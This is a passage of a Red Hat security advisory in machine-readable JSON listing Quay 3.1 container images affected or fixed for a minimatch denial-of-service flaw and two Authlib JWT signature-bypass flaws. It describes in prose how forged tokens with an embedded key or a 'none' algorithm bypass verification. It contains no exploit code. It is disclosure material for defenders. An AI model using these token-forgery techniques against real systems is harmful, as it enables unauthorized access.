"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-27962",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-16T18:02:07.041902+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448164"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker\u0027s key, allowing them to bypass authentication and gain unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This critical vulnerability in Authlib\u0027s JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Impact is high to confidentiality and integrity as attackers can bypass authentication.\n\nThe impact for Red Hat Quay is rated as low because it imports authlib solely as a JWK parsing utility and performs all JWT signature verification through PyJWT, so the vulnerable jws.deserialize_compact() code path is never called.\n\nRed Hat OpenShift AI is not affected, since authlib is only present as a transitive dependency in the dev dependency group and is not included in production image builds, so the vulnerable code is not present in the shipped product.\n\nRed Hat Satellite is not affected, as authlib is only present as a dependency of fastmcp. In Satellite, fastmcp only invokes authlib using jwt.decode() which isn\u0027t able to reach the vulnerability condition even with key=none.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "RHBZ#2448164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27962",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5"
}
],
"release_date": "2026-03-16T17:34:38.946000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
